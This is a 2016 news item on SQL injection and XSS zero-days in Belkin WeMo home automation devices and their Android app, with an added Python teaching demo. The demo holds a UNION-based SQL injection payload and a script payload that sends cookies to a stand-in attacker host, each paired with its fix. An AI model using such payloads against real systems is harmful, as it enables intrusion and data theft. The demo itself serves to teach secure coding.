SQLi, XSS zero-days expose Belkin IoT devices, Android smartphones

LONDON, UK – Research director Scott Tenaglia and lead research engineer Joe Tanen detailed the vulnerabilities during their ‘Breaking BHAD: Abusing Belkin Home Automation devices’ talk at the Black Hat Europe conference in London last Friday.

The zero-day flaws specifically relate to Belkin’s smart home products and accompanying Android mobile application, which is used to wirelessly control the home automation devices.

The first flaw, a SQL injection vulnerability, enables an attacker to inject malicious SQL into the home automation device through the data it accepts from the paired Android WeMo smartphone app, and thus take root control of the device.

The second flaw, the one directly affecting the WeMo Android app, is a cross-site scripting (XSS) issue: an attacker with network access can execute arbitrary JavaScript inside the Android application and, through the app's access to the phone, steal sensitive personal data.
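The two bug classes above, shown side by side in a constructed Python model that is not Belkin's or WeMo's code: an automation rule looked up by a name that is concatenated into SQL (injection) next to the parameterised query that fixes it, and a device-supplied name rendered into app HTML unescaped (XSS) next to the escaped form. The table and column names, the rule-name and device-name vectors, the `secrets` table and the payloads are all assumptions made for illustration.

```python
import html
import sqlite3

# Constructed model of a device-side rules store (assumption: not WeMo's schema).
# A 'secrets' table stands in for anything an attacker should not be able to read.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rules (id INTEGER PRIMARY KEY, name TEXT, action TEXT)")
    conn.execute("CREATE TABLE secrets (token TEXT)")
    conn.execute("INSERT INTO rules (name, action) VALUES ('night', 'off')")
    conn.execute("INSERT INTO secrets (token) VALUES ('root-token')")
    conn.commit()
    return conn


def find_rule_actions_vulnerable(conn, name):
    # Untrusted rule name is spliced straight into the statement: SQL injection.
    query = f"SELECT action FROM rules WHERE name = '{name}'"
    return [row[0] for row in conn.execute(query)]


def find_rule_actions_safe(conn, name):
    # Same lookup with a bound parameter; the name can never become SQL syntax.
    return [row[0] for row in conn.execute(
        "SELECT action FROM rules WHERE name = ?", (name,))]


# Constructed payload: closes the string, appends a UNION that reads the
# secrets table, and comments out the trailing quote.
SQLI_PAYLOAD = "x' UNION SELECT token FROM secrets --"


def render_device_card_vulnerable(device_name):
    # A name received from the network is dropped into HTML unescaped: XSS
    # when this markup is loaded into a WebView or similar HTML renderer.
    return f"<div class='device'>{device_name}</div>"


def render_device_card_safe(device_name):
    # Escape <, >, &, and quotes so the name is rendered as text, not markup.
    return f"<div class='device'>{html.escape(device_name, quote=True)}</div>"


# Constructed payload: a script tag the app would execute if rendered as-is.
XSS_PAYLOAD = "<script>fetch('http://attacker.invalid/?c=' + document.cookie)</script>"


def contains_active_markup(markup):
    # Minimal check used by the demo: does a raw <script> tag survive rendering?
    return "<script" in markup.lower()


def demo():
    conn = make_db()
    return {
        "sqli_vulnerable": find_rule_actions_vulnerable(conn, SQLI_PAYLOAD),
        "sqli_safe": find_rule_actions_safe(conn, SQLI_PAYLOAD),
        "xss_vulnerable": contains_active_markup(render_device_card_vulnerable(XSS_PAYLOAD)),
        "xss_safe": contains_active_markup(render_device_card_safe(XSS_PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable lookup returns the contents of `secrets` for the injected name while the parameterised lookup returns nothing, and the escaped card keeps the script tag inert; in the real app the rendering side would be Java or Kotlin feeding a WebView, but the escaping rule is the same.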

Read more: SQLi, XSS zero-days expose Belkin IoT devices, Android smartphones

Story added 7 November 2016; the full text is available at the source linked above.